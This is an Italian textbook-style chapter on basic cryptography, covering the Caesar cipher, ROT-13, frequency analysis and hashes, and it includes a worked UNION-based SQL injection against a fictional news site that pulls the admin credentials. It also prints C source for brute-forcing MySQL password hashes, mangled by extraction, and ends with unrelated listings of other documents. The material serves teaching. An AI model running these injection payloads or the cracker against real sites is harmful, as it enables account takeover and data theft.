CAPITOLO 6: CRITTOGRAFIA SPICCIOLA

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "CAPITOLO 6: CRITTOGRAFIA SPICCIOLA"

Transcript

1 CAPITOLO 6: CRITTOGRAFIA SPICCIOLA La crittografia è un argomento molto esteso e molto complicato, ma per introdurvi a questo pazzo mondo, non c è modo più semplice che cominciare col parlare degli antichi romani. CIFRARIO DI CESARE Cesare (spero sappiate di chi parlo quello dei dadi star!) per comunicare con l esercito e non far capire i suoi piani al nemico, comunicava mediante messaggi cifrati secondo un algoritmo ancora oggi utilizzato, detto appunto il Cifrario di Cesare. A raccontarcelo è un certo Svetonio (uno storico) che nella sua opera, la vita di Cesare, scrive Extant et ad Ciceronem, item ad familiares domesticis de rebus, in quibus, si qua occultius perferenda erant, per notas scripsit, id est sic structo litterarum ordine, ut nullum verbum effici posset: quae si qui investigare et persequi velit, quartam elementorum litteram, id est D pro A et perinde reliquas commutet Che è latino (una lingua, morta per giunta), a noi interessa la parte sottolineata, che si traduce (non letteralmente): se qualcuno volesse capire cosa ci sia scritto su una di queste lettera, avrebbe dovrebbe sostituire la D con la A e così via Cesare praticamente sostituiva una lettera dell alfabeto con un altra spostata di tre lettere in avanti. Quindi per tradurre un messaggio, si doveva avere in mente una tabella come la seguente: A B C D E F G H I L M N O P Q R S T U V Z D E F G H I L M N O P Q R S T U V Z A B C dunque, per esempio, NICOLA sarebbe stato codificato come QNFROD. Costruiamo ora un algoritmo semplice in C++ che codifichi per noi una stringa, e agisca come fosse un essere umano in possesso della tabella che vediamo sopra. #include <iostream> #include <string> #include <ctype.h> //toupper(char) #include <stdlib.h> using namespace std; const string alfabeto = "ABCDEFGHIJKLMNOPQRSTUVXYWZ"; const string cifrato = "DEFGHIJKLMNOPQRSTUVXYWZABC"; int main(int argc, char *argv[]) { string frase(""); string risultato(""); getline(cin,frase); for (int i = 0; i < frase.length(); i++) { bool trovato = false; int j = 0; for (j = 0; j < alfabeto.length(); j++) if (toupper(frase[i]) == alfabeto[j]) { risultato = risultato + cifrato[j]; trovato = true; if (trovato == false) risultato = risultato + frase[i]; cout << endl << risultato << endl; return 0;

2 Per la decodifica basterà scambiare le due stringhe, ovvero considerare come alfabeto la stringa cifrato e viceversa Questo è un algoritmo che più si avvicina al modo di pensare di un essere umano, ma non è l unico possibile: anzi, ce ne sono di più semplici. CRITTOANALISI SPICCIOLA Lo spostamento potrebbe essere non solo di tre lettere, ma anche di cinque lettere, per esempio. Il problema è: ottenuta una stringa cifrata con questo algoritmo, ma con uno sfasamento k qualsiasi, come faccio ad analizzarla e a ricostruire il messaggio senza sapere k. Il metodo più elementare è cambiare k da 1 a 25 (a 26 abbiamo l alfabeto normale, a 27 abbiamo la stessa cosa di 1 e così via) e vedere quando la stringa ha un significato. Ma noi non siamo per le soluzioni semplici e brutali e dunque andiamo a vedere un po di teoria. ANALISI DELLA FREQUENZA DELLE LETTERE Per rompere (o anche crackare) un algoritmo di codifica di questo tipo o, più in generale, a sostituzione (dove l alfabeto cifrato non è ordinato), si può ricorrere ad un analisi della frequenza delle singole lettere dell alfabeto nella lingua in cui si pensa scritto il testo. Immaginiamo infatti di avere un file di testo codificato secondo questo algoritmo, sicuramente (se consideriamo il solo alfabeto italiano, senza le x,y,w,j,k) sappiamo che la lettera meno utilizzata è la h a cui possiamo far seguire la z, fino ad arrivare alla più utilizzata che è la lettera e. Facendo dunque un analisi statistica del testo, possiamo arrivare a sapere con una buona approssimazione (beh non è proprio perfetto) quale lettera è stata sostituita alla e e quale alla h e così per ogni lettera; se il testo è abbastanza lungo avremo una traduzione quasi perfetta. Nel caso della codifica di Cesare, una volta trovata quale lettera sostituisce la e o la a o la i (le tre lettere più usate in italiano, ma anche in inglese ) potremmo, con al massimo tre tentativi di traduzione, risalire allo spostamento k e ottenere la stringa in chiaro. Nel caso di una sostituzione generica, dobbiamo addestrare un programma con le frequenze (ovvero le ripetizioni) di uno o (ancora meglio) più testi in italiano che (possibilmente) trattino dello stesso argomento del testo cifrato e fare una media dei risultati. Operato tale conteggio passeremo al conteggio delle lettere nel testo cifrato e alla sostituzione secondo la frequenza. Fatto ciò, cercheremo di indovinare qualche parola evidente e sostituire i caratteri in tutto il testo e vedere di prova in prova cosa ne esce fuori. NOTA: se mai dovrete realizzare un programma per eseguire questo tipo di analisi: prevedete un modo per cambiare l associazione delle lettere durante l esecuzione, in modo da poter procedere, se è il caso, a tentativi; fate in modo di poter eliminare le lettere indesiderate; aggiungete un dizionario che provi ad completare automaticamente le parole e ad adattare il testo secondo i cambiamenti fatti. CIFRATURA A CHIAVE Supponiamo di avere una stringa di caratteri rappresentata in esadecimale come A 0B 0C 0D 0E 0F e supponiamo di aggiungere non sempre la stessa quantità, ma una parola chiave che supponiamo essere per semplicità A 0B 0C 0D 0E 0F = A 0C 0D 0D 0E 10 11

3 Abbiamo ottenuto, facendo la somma, una nuova stringa che naturalmente potrà essere decodificata, conoscendo la parola chiave, mediante una semplice sottrazione: A 0C 0D 0D 0E = A 0B 0C 0D 0E 0F Nel caso si verifichi un overflow (che nella decodifica equivarrà ad un underflow) possiamo fare il giro, ovvero da FF tornare a 00. Quando andremo a fare la sottrazione e arriveremo a 00, andremo a FF e otterremo la decodifica. ESEMPI DI ANALISI ESEMPIO 1 Supponiamo che qualcuno in un sistema di chat, abbia creato un sistema client-server che comunichi secondo una chiave variabile (supponiamo che non possa variare in lunghezza). La chiave sarà la prima cosa inviata dal server al client insieme ad un messaggio di benvenuto sempre uguale, come segue: //il server invia al client il benvenuto e la chiave server> [NUM][HELLO][CHIAVE][END] //il client risponde con HELLO e invia la chiave per conferma client> [NUM+1][HELLO][CHIAVE][END] //il server dice che la chiave è esatta server> [NUM+2][OK][END]... Sicuramente la chiave sarà l unica cosa a variare in questa conversazione e dunque quello che ci interessa sarà la parte variabile della prima stringa inviata dal server in successive connessioni. Conoscendo quella possiamo decrittare tutti i comandi inviati al server e che il server ci invia e dunque ottenere tutto il protocollo, oppure, analizzando il traffico in LAN, vedere cosa si dicono due persone che sono in rete. ESEMPIO 2 Supponiamo di avere un programma che codifichi le password di accesso degli utenti con questo metodo e di voler decodificare una password di un utente, scritta in questo modo: utente:qfsƒ or per decodificarla basterà semplicemente inserire (se possibile) un nuovo utente con la stessa lunghezza della password codificata, mantenendo un carattere costante, esempio utilizzando aaaaaa e poi vedendo cosa è stato sommato cracker:brbqrbr Ora abbiamo che brbqrbr aaaaaaa in esadecimale sono: =

4 Il che ci dice che aggiungendo la stessa quantità alla stringa precedente otterremo la password in chiaro: f = f 6e 61 <==> persona abbiamo così ottenuto facilmente la password in chiaro, senza molto sforzo. ROT-13 #include <iostream> #include <stdlib.h> using namespace std; int main(int argc, char *argv[]) { string frase(""); string risultato(""); getline(cin,frase); for (int i = 0; i < frase.length(); i++) { int c = (int)frase[i]; if (c >= 65 && c <=77) c = c + 13; else if (c >= 78 && c <=90) c = c - 13; else if (c >= 97 && c <=109) c = c + 13; else if (c >= 110 && c <=122) c = c - 13; risultato = risultato + (char)c; cout << endl << risultato << endl; system("pause"); return 0; La lingua inglese ha 26 lettere e quello che facciamo con la codifica rot-13 è appunto aggiungere o sottrarre 13 alle lettere. Infatti, come si può vedere dal programma, numeri e simboli non vengono tradotti.per prima cosa verifichiamo qual è la posizione di una lettera nell alfabeto. Se essa si trova tra le prime tredici (26/2) da a ad m, allora la lettera è rimpiazzata dalla tredicesima lettera dopo di essa (addizione). Se invece le lettere vanno da n a z, ovvero appartiene all altra metà dell insieme di lettere, la sostituiamo con la tredicesima lettera prima di essa (sottrazione). Nel nostro caso, quella serie di if...else if... nidificati fa questo effetto (riferendosi al valore in ascii delle lettere) e distinguendo tra maiuscole e minuscole. Per decodificare, basterà, intuitivamente eseguire di nuovo la codifica della stringa codificata: l algoritmo di codifica e di decodifica in questo caso coincidono. Il ROT-13 è spesso usato per codificare i cookie su internet.

5 INTRODUZIONE AGLI HASH A SENSO UNICO Non considerate concluso il discorso sugli algoritmi di crittazione, ma c è bisogno di studiare, studiare, studiare comunque tutti gli algoritmi di crittazione visti fino ad ora ci permettevano di risalire semplicemente al testo in chiaro, naturalmente conoscendone i segreti. Ci sono, però, algoritmi che non prevedono la decrittazione, utilizzati soprattutto per la codifica di password. L uscita dell algoritmo sarà una stringa che rappresenterà un immagine della password, da cui non si potrà risalire (se non attraverso attacchi di forza bruta o attacchi basati su dizionario) alla password in chiaro. La procedura di login assumerà dunque un aspetto simile a questo: Dunque non ci sarà una decodifica della password, ma un confronto tra l hash contenuto nel database e quello della password inserita dall utente. Sarà dunque più difficile risalire alla password anche se si ha a disposizione l accesso al database (naturalmente rispetto a quando è memorizzata in chiaro). Qui non tratterò degli algoritmi (per altro liberamente disponibili in rete) ma mi soffermerò su come si fa il crack di un hash. L algoritmo più utilizzato è (almeno credo) quello MD5, poi ci sono MD2, MD4, SHA1, etc ci interessa perchè è utilizzato soprattutto per la protezione degli accessi alle pagine web (per esempio in php, ci è offerta una funzione che semplicemente calcola l hash di una parola). L algoritmo in questione esamina una stringa di qualsiasi lunghezza e ne tira fuori una stringa di 128 bit, rappresentabile mediante 16 cifre esadecimali (rappresentate come in figura), che sarà costante ad ogni analisi e diversa da ogni altra (più o meno ). L algoritmo è liberamente disponibile online e riassunto nella RFC1321. Per crackarlo, bisogna utilizzare i metodi sopra citati. Un attacco basato su dizionario, semplicemente prende un elenco di parole (dizionario), ne fa l hash e lo confronta con l hash da crackare. Un attacco di forza bruta (bruteforce), invece, prova tutte le combinazioni di caratteri digitabili da tastiera (o un loro sottoinsieme, per esempio, limitato alle sole lettere minuscole), ne fa l hash e lo confronta con quello da crackare. Naturalmente il secondo è sicuramente meno veloce del primo, ma certamente più efficace (ma dipende dai casi). Di solito un modo di procedere è quello che segue, anche se presenta il problema che per esaurire tutte le possibilità ci vorrebbe molto, ma molto tempo e naturalmente noi non abbiamo tanto tempo, poiché una persona sana di mente cambia la sua password almeno ogni mese. Ma vediamo in ordine i passi da fare:

6 1) provare con dizionario delle password più usate 2) provare attacco con dizionario italiano / nomi 3) provare attacco con dizionari precedenti facendo variare minuscole e maiuscole 4) provare con attacco bruteforce con soli numeri 5) provare con attacco bruteforce con sole lettere 6) provare con attacco bruteforce con lettere maiuscole e minuscole 7) provare con attacco bruteforce con lettere maiuscole, minuscole e numeri 8) provare con attacco bruteforce con tutti i caratteri e così passeranno gli anni e le stagioni. Per ottenere una password comunque, un modo (relativamente) più semplice è sicuramente l ingegneria sociale. Perché crackare una password se l utente o ancor meglio l amministratore è così intelligente da darcela? Se la tecnica è inapplicabile, si può pensare di procedere con lo sniffing dei pacchetti provenienti dal computer dell utente o amministratore o con un keylogger o con un trojan o in tanti altri modi. ESEMPIO DI CRACKING Su internet si diffonde sempre più l uso dei CMS (Content Management System) che permettono di creare un portale in modo semplice ed intuitivo. Proprio questi, poiché molto usati e soprattutto open-source, sono quelli più analizzati (abbiamo il codice sorgente) e non ci vuole molto perché spunti fuori un nuovo problema. Quello che ci interessa è capire come funziona l SQL INJECTION. Tutti voi, o almeno la maggior parte di voi, avrà sicuramente sentito parlare di questa tecnica di intrusione. Un sito dinamico, basato su un database che supporti l operazione di unione (union), che in una pagina presenti un argomento non controllato dal codice e che andrà a prendere parte a una select, può essere utilizzato per ottenere (se ce n è l opportunità) informazioni sensibili, che dovrebbero essere più protette. Chi conosce il linguaggio SQL sa che una select richiede il nome della tabella e il nome degli attributi da estrarre. Come arrivare a conoscerli, o almeno provarci, è semplice. Per prima cosa, basta pensare che un qualsiasi programmatore standard chiamerà le tabelle con nomi standard, naturalmente per avere qualcosa di mnemonico nelle sue query ovvero per facilitarsi la vita; la stessa cosa varrà per gli attributi. Ci facilita la vita se, come spesso capita, è abilitata un opzione di debug che, in caso di errore (quello che noi ricerchiamo), restituisca la query così com è stata fatta. Prendiamo come esempio un sito non ben progettato, che chiameremo (un sito inventato, non reale ogni riferimento a persone o cose esistenti nella realtà è puramente casuale ) e supponiamo che una sezione del sito sia dedicata alle news (ovvero alle notizie), di solito presente in molti siti e si suppone insicuro perché abbiamo una select fatta generalmente in questo modo select titolo,data,testo, from notizie where id=1 ora se per esempio abbiamo che una news viene richiamata in questo modo allora possiamo tentare di scrivere dove si ricorda che %20 sta per spazio vuoto. Se tutto va bene, o meglio male per l amministratore e bene per noi, quello che esce fuori è qualcosa del genere

7 Query Richiesta: SELECT id, titolo, corpo, DATE_FORMAT(data_pubblicazione, '%d/%m/%y') AS data_di_pubblicazione FROM news WHERE id=106 union Errore Riscontrato: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Il che ci dà più informazioni di quanto dovremmo, poiché è più sicuro certamente disabilitare il debug, ma anche far mostrare solo la parte della query che ha generato l errore. Per prima cosa vediamo che il nostro programmatore ha l abitudine di dare nomi standard alle tabelle e agli attributi, quindi possiamo supporre quale sia il nome della tabella utenti e quale sia il nome degli attributi che contengono nome utente e password. Se abbiamo qualche dubbio, basta andare nella pagina di login e vedere come si chiamano i campi del form di accesso: un programmatore standard, come quello che abbiamo davanti, utilizzerà lo stesso nome per i campi. In questo caso abbiamo login e passwd. Esaminiamo la query per ottenere un unione valida. L attributo id lo immaginiamo numerico, l attributo titolo lo immaginiamo come una stringa di testo e lo stesso vale per l attributo corpo e poi vediamo data_pubblicazione che sarà del tipo data. show_news.php?id_news=106%20union%20select%200,login,0,0%20from%20users ma in questo particolare caso qualcosa và storto, ovvero lo stesso id viene utilizzato in un altra query per mostrare gli allegati e dunque otteniamo l errore Query Richiesta: SELECT * FROM news_allegati WHERE rif_news=106 union select 0,login,0,0 from users Errore Riscontrato: The used SELECT statements have a different number of columns Ci siamo arenati in una query dove non conosciamo gli attributi, e ci viene dato l errore che la query ha un numero di colonne differente. Ma cosa succede se 106 lo sostituiamo con -1 e magari settiamo nella nostra union l attributo relativo a titolo come NULL (ovvero zero) e uniamo quello relativo al corpo della notizia come login show_news.php?id_news=-1%20union%20select%200,0,login,0%20from%20users otteniamo così il login di amministratore che sarà admin e utilizzando l url show_news.php?id_news=-1%20union%20select%200,0,passwd,0%20from%20users otteniamo la password. Otterremo una cosa del genere 43e9a4ab75570f5b. Che ci appare a prima vista come un hash e in questo caso è quello restituito dalla funzione password() inclusa in MySql. Come faccio a saperlo? Beh, ci sono tanti modi, uno, per esempio, è andare a vedere il tipo di database utilizzato dal server che ospita il sito, cercare un po su google mysql password o provare a ricercare direttamente l hash (non si sa mai che sia uno di default, come in questo caso). E dunque, trovato di che tipo di hash si tratta, o facciamo noi un programma che faccia il bruteforce, come spiegato prima, oppure ne prendiamo uno bello e fatto che ci dirà che la password che stiamo cercando è appunto admin. Possiamo ora recarci al pannello di controllo dell amministratore del sito e accedervi coi privilegi di un amministratore. CODICE SORGENTE Quello che segue è il codice sorgente per il bruteforcing degli hash di mysql, preso così come l ho trovato (dopo una lunga ricerca) su internet.

8 /* This program is public domain. Share and enjoy. * * Example: * $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast * $ mysqlfast 6294b50f67eda209 * Hash: 6294b50f67eda209 * Trying length 3 * Trying length 4 * Found pass: barf * * The MySQL password hash function could be strengthened considerably * by: * - making two passes over the password * - using a bitwise rotate instead of a left shift * - causing more arithmetic overflows */ #include <stdio.h> typedef unsigned long u32; /* Allowable characters in password; is printable ascii */ #define MIN_CHAR 33 #define MAX_CHAR 126 /* Maximum length of password */ #define MAX_LEN 12 #define MASK 0x7fffffffL int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary) { int i, c; u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2; u32 newstate1, newstate2, newstate3; u32 state1_ary[max_len-2], state2_ary[max_len-2]; u32 xor_ary[max_len-3], step_ary[max_len-3]; i = -1; sum = 7; state1_ary[0] = L; state2_ary[0] = 0x L; while (1) { while (i < stop) { i++; pass_ary[i] = MIN_CHAR; step_ary[i] = (state1_ary[i] & 0x3f) + sum; xor_ary[i] = step_ary[i]*min_char + (state1_ary[i] << 8); sum += MIN_CHAR; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i]

9 + ((state2_ary[i] << 8) ^ state1_ary[i+1]); state1 = state1_ary[i+1]; state2 = state2_ary[i+1]; step = (state1 & 0x3f) + sum; xor1 = step*min_char + (state1 << 8); xor2 = (state2 << 8) ^ state1; for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) { newstate2 = state2 + (xor1 ^ xor2); newstate1 = state1 ^ xor1; newstate3 = (targ2 - newstate2) ^ (newstate2 << 8); div = (newstate1 & 0x3f) + sum + c; diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK; if (diff % div!= 0) continue; d = diff / div; if (d < MIN_CHAR d > MAX_CHAR) continue; div = (newstate3 & 0x3f) + sum + c + d; diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK; if (diff % div!= 0) continue; e = diff / div; if (e < MIN_CHAR e > MAX_CHAR) continue; pass_ary[i+1] = c; pass_ary[i+2] = d; pass_ary[i+3] = e; return 1; while (i >= 0 && pass_ary[i] >= MAX_CHAR) { sum -= MAX_CHAR; i--; if (i < 0) break; pass_ary[i]++; xor_ary[i] += step_ary[i]; sum++; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); return 0; void crack(char *hash) { int i, len; u32 targ1, targ2, targ3;

10 int pass[max_len]; if ( sscanf(hash, "%8lx%lx", &targ1, &targ2)!= 2 ) { printf("invalid password hash: %s\n", hash); return; printf("hash: %08lx%08lx\n", targ1, targ2); targ3 = targ2 - targ1; targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); for (len = 3; len <= MAX_LEN; len++) { printf("trying length %d\n", len); if ( crack0(len-4, targ1, targ3, pass) ) { printf("found pass: "); for (i = 0; i < len; i++) putchar(pass[i]); putchar('\n'); break; if (len > MAX_LEN) printf("pass not found\n"); int main(int argc, char *argv[]) { int i; if (argc <= 1) printf("usage: %s hash\n", argv[0]); for (i = 1; i < argc; i++) crack(argv[i]); return 0;

Siamo così arrivati all aritmetica modulare, ma anche a individuare alcuni aspetti di come funziona l aritmetica del calcolatore come vedremo.

Siamo così arrivati all aritmetica modulare, ma anche a individuare alcuni aspetti di come funziona l aritmetica del calcolatore come vedremo. DALLE PESATE ALL ARITMETICA FINITA IN BASE 2 Si è trovato, partendo da un problema concreto, che con la base 2, utilizzando alcune potenze della base, operando con solo addizioni, posso ottenere tutti

Dettagli

Introduzione alla programmazione in C

Introduzione alla programmazione in C Introduzione alla programmazione in C Testi Consigliati: A. Kelley & I. Pohl C didattica e programmazione B.W. Kernighan & D. M. Ritchie Linguaggio C P. Tosoratti Introduzione all informatica Materiale

Dettagli

3. Installare Wamp Server

3. Installare Wamp Server E107 WEB SYSTEM Corso on line di progettazione siti dinamici: livello base R E A L I Z Z A Z I O N E D I 3. Installare Wamp Server By e107 Italian Team Sito web:http://www.e107italia.org Contatto: admin@e107italia.org

Dettagli

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox.

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox. Oggi parlerò di qualcosa che ha a che fare relativamente con la tecnica fotografica, ma che ci può dare una mano nella gestione dei nostri archivi digitali, soprattutto nel rapporto professionale con altre

Dettagli

4 3 4 = 4 x 10 2 + 3 x 10 1 + 4 x 10 0 aaa 10 2 10 1 10 0

4 3 4 = 4 x 10 2 + 3 x 10 1 + 4 x 10 0 aaa 10 2 10 1 10 0 Rappresentazione dei numeri I numeri che siamo abituati ad utilizzare sono espressi utilizzando il sistema di numerazione decimale, che si chiama così perché utilizza 0 cifre (0,,2,3,4,5,6,7,8,9). Si dice

Dettagli

Alessandro Pellegrini

Alessandro Pellegrini Esercitazione sulle Rappresentazioni Numeriche Esistono 1 tipi di persone al mondo: quelli che conoscono il codice binario e quelli che non lo conoscono Alessandro Pellegrini Cosa studiare prima Conversione

Dettagli

--- PREMESSE INTRODUZIONE. .:luxx:.

--- PREMESSE INTRODUZIONE. .:luxx:. SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una

Dettagli

Dimensione di uno Spazio vettoriale

Dimensione di uno Spazio vettoriale Capitolo 4 Dimensione di uno Spazio vettoriale 4.1 Introduzione Dedichiamo questo capitolo ad un concetto fondamentale in algebra lineare: la dimensione di uno spazio vettoriale. Daremo una definizione

Dettagli

INTRODUZIONE I CICLI DI BORSA

INTRODUZIONE I CICLI DI BORSA www.previsioniborsa.net 1 lezione METODO CICLICO INTRODUZIONE Questo metodo e praticamente un riassunto in breve di anni di esperienza e di studi sull Analisi Tecnica di borsa con specializzazione in particolare

Dettagli

risulta (x) = 1 se x < 0.

risulta (x) = 1 se x < 0. Questo file si pone come obiettivo quello di mostrarvi come lo studio di una funzione reale di una variabile reale, nella cui espressione compare un qualche valore assoluto, possa essere svolto senza necessariamente

Dettagli

PROCEDURA INVENTARIO DI MAGAZZINO di FINE ESERCIZIO (dalla versione 3.2.0)

PROCEDURA INVENTARIO DI MAGAZZINO di FINE ESERCIZIO (dalla versione 3.2.0) PROCEDURA INVENTARIO DI MAGAZZINO di FINE ESERCIZIO (dalla versione 3.2.0) (Da effettuare non prima del 01/01/2011) Le istruzioni si basano su un azienda che ha circa 1000 articoli, che utilizza l ultimo

Dettagli

ESEMPI DI QUERY SQL. Esempi di Query SQL Michele Batocchi AS 2012/2013 Pagina 1 di 7

ESEMPI DI QUERY SQL. Esempi di Query SQL Michele Batocchi AS 2012/2013 Pagina 1 di 7 ESEMPI DI QUERY SQL Dati di esempio... 2 Query su una sola tabella... 2 Esempio 1 (Ordinamento)... 2 Esempio 2 (Scelta di alcune colonne)... 3 Esempio 3 (Condizioni sui dati)... 3 Esempio 4 (Condizioni

Dettagli

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere

Dettagli

Convertitori numerici in Excel

Convertitori numerici in Excel ISTITUTO DI ISTRUZIONE SUPERIORE G. M. ANGIOY CARBONIA Convertitori numerici in Excel Prof. G. Ciaschetti Come attività di laboratorio, vogliamo realizzare dei convertitori numerici con Microsoft Excel

Dettagli

Dispense di Informatica per l ITG Valadier

Dispense di Informatica per l ITG Valadier La notazione binaria Dispense di Informatica per l ITG Valadier Le informazioni dentro il computer All interno di un calcolatore tutte le informazioni sono memorizzate sottoforma di lunghe sequenze di

Dettagli

NOZIONI BASE SHELL E SCRIPT LINUX

NOZIONI BASE SHELL E SCRIPT LINUX NOZIONI BASE SHELL E SCRIPT LINUX Aggiornato al 11 gennaio 2006 Ermes ZANNONI (ermes@zannoni.to.it) (http://www.zannoni.to.it) Indice : 1. Introduzione 2. La Shell 2.1 Comandida Shell 2.1.1 File e directory

Dettagli

OSSIF WEB. Manuale query builder

OSSIF WEB. Manuale query builder OSSIF WEB Manuale query builder - Maggio 2010 1) Sommario 1) SOMMARIO... 2 INTRODUZIONE... 3 Scopo del documento... 3 Struttura del documento... 3 Descrizione dell interfaccia grafica... 3 SELEZIONE DI

Dettagli

CONTENT MANAGEMENT SY STEM

CONTENT MANAGEMENT SY STEM CONTENT MANAGEMENT SY STEM I NDI CE I NTRODUZI ONE Accesso al CMS 1) CONTENUTI 1.1 I nserimento, modifica e cancellazione dei contenuti 1.2 Sezioni, categorie e sottocategorie 2) UTENTI 3) UP LOAD FILES

Dettagli

1) GESTIONE DELLE POSTAZIONI REMOTE

1) GESTIONE DELLE POSTAZIONI REMOTE IMPORTAZIONE ESPORTAZIONE DATI VIA FTP Per FTP ( FILE TRANSFER PROTOCOL) si intende il protocollo di internet che permette di trasferire documenti di qualsiasi tipo tra siti differenti. Per l utilizzo

Dettagli

APPUNTI DI MATEMATICA LE FRAZIONI ALGEBRICHE ALESSANDRO BOCCONI

APPUNTI DI MATEMATICA LE FRAZIONI ALGEBRICHE ALESSANDRO BOCCONI APPUNTI DI MATEMATICA LE FRAZIONI ALGEBRICHE ALESSANDRO BOCCONI Indice 1 Le frazioni algebriche 1.1 Il minimo comune multiplo e il Massimo Comun Divisore fra polinomi........ 1. Le frazioni algebriche....................................

Dettagli

Codifica: dal diagramma a blocchi al linguaggio C++

Codifica: dal diagramma a blocchi al linguaggio C++ Codifica: dal diagramma a blocchi al linguaggio C++ E necessario chiarire inizialmente alcuni concetti. La compilazione Il dispositivo del computer addetto all esecuzione dei programmi è la CPU La CPU

Dettagli

http://www.programmiamo.altervista.org/c/oop/o...

http://www.programmiamo.altervista.org/c/oop/o... PROGRAMMIAMO Programma per la gestione di un conto corrente C++ - Costruttore e distruttore C++ Home Contatti Supponiamo ora di voler scrivere un programma a menu per la gestione di un conto corrente bancario.

Dettagli

Il programmatore che c e in noi Lezione 12 Statements

Il programmatore che c e in noi Lezione 12 Statements Il programmatore che c e in noi Lezione 12 Statements Mi sveglio, vado in bagno, doccia, colazione. Per colazione, preparo il caffe, accendo il gas, se e acceso metto la caffettiera sopra il fornello ed

Dettagli

Workland CRM. Workland CRM Rel 2570 21/11/2013. Attività --> FIX. Magazzino --> NEW. Nessuna --> FIX. Ordini --> FIX

Workland CRM. Workland CRM Rel 2570 21/11/2013. Attività --> FIX. Magazzino --> NEW. Nessuna --> FIX. Ordini --> FIX Attività Attività --> FIX In alcuni casi, in precedenza, sulla finestra trova attività non funzionava bene la gestione dei limiti tra date impostati tramite il menu a discesa (Oggi, Tutte, Ultima Settimana,

Dettagli

CONCETTO DI ANNIDAMENTO

CONCETTO DI ANNIDAMENTO LEZIONE14 SQL ANNIDAMENTI PAG. 1 / 5 PROF. ANDREA ZOCCHEDDU LEZIONE14 SQL ANNIDAMENTI CONCETTO DI ANNIDAMENTO LINGUAGGIO SQL QUERY ANNIDATE Per annidamento si intende la possibilità che, all interno di

Dettagli

FPf per Windows 3.1. Guida all uso

FPf per Windows 3.1. Guida all uso FPf per Windows 3.1 Guida all uso 3 Configurazione di una rete locale Versione 1.0 del 18/05/2004 Guida 03 ver 02.doc Pagina 1 Scenario di riferimento In figura è mostrata una possibile soluzione di rete

Dettagli

void funzioneprova() { int x=2; cout<<"dentro la funzione x="<<x<<endl; }

void funzioneprova() { int x=2; cout<<dentro la funzione x=<<x<<endl; } FUNZIONI 57. Cosa servono le funzioni? A spezzare il programma in diverse parti relativamente indipendenti fra loro, ovvero interagenti sono attraverso i parametri di input ed IL VALORE di uscita. In questo

Dettagli

Progetto di Ingegneria del Software 2. SWIMv2

Progetto di Ingegneria del Software 2. SWIMv2 Progetto di Ingegneria del Software 2 2012/2013 SWIMv2 Guida di installazione Docente: Prof. Luca Mottola Davide Brambilla Antonio Caputo Paolo Caputo 1 Introduzione La piattaforma è stata sviluppata come

Dettagli

Statistica e biometria. D. Bertacchi. Variabili aleatorie. V.a. discrete e continue. La densità di una v.a. discreta. Esempi.

Statistica e biometria. D. Bertacchi. Variabili aleatorie. V.a. discrete e continue. La densità di una v.a. discreta. Esempi. Iniziamo con definizione (capiremo fra poco la sua utilità): DEFINIZIONE DI VARIABILE ALEATORIA Una variabile aleatoria (in breve v.a.) X è funzione che ha come dominio Ω e come codominio R. In formule:

Dettagli

I SISTEMI DI NUMERAZIONE

I SISTEMI DI NUMERAZIONE ISTITUTO DI ISTRUZIONE SUPERIORE G. M. ANGIOY CARBONIA I SISTEMI DI NUMERAZIONE Prof. G. Ciaschetti Fin dall antichità, l uomo ha avuto il bisogno di rappresentare le quantità in modo simbolico. Sono nati

Dettagli

Strutturazione logica dei dati: i file

Strutturazione logica dei dati: i file Strutturazione logica dei dati: i file Informazioni più complesse possono essere composte a partire da informazioni elementari Esempio di una banca: supponiamo di voler mantenere all'interno di un computer

Dettagli

Cimini Simonelli - Testa

Cimini Simonelli - Testa WWW.ICTIME.ORG Joomla 1.5 Manuale d uso Cimini Simonelli - Testa Il pannello di amministrazione Accedendo al pannello di amministrazione visualizzeremo una schermata in cui inserire il nome utente (admin)

Dettagli

Capitolo 2. Operazione di limite

Capitolo 2. Operazione di limite Capitolo 2 Operazione di ite In questo capitolo vogliamo occuparci dell operazione di ite, strumento indispensabile per scoprire molte proprietà delle funzioni. D ora in avanti riguarderemo i domini A

Dettagli

A intervalli regolari ogni router manda la sua tabella a tutti i vicini, e riceve quelle dei vicini.

A intervalli regolari ogni router manda la sua tabella a tutti i vicini, e riceve quelle dei vicini. Algoritmi di routing dinamici (pag.89) UdA2_L5 Nelle moderne reti si usano algoritmi dinamici, che si adattano automaticamente ai cambiamenti della rete. Questi algoritmi non sono eseguiti solo all'avvio

Dettagli

Utilizzando Microsoft Access. Si crea la tabella Anagrafica degli alunni,le Materie e i voti si mettono alcuni campi

Utilizzando Microsoft Access. Si crea la tabella Anagrafica degli alunni,le Materie e i voti si mettono alcuni campi Vogliamo creare una struttura per permettere di memorizzari i voti della classe in tutte le materie Per fare questo untilizziamo tre tabelle Alunni,materie,voti Alunni Materie Voti Creo un record per ogni

Dettagli

Joomla: Come installarlo e come usarlo. A cura di

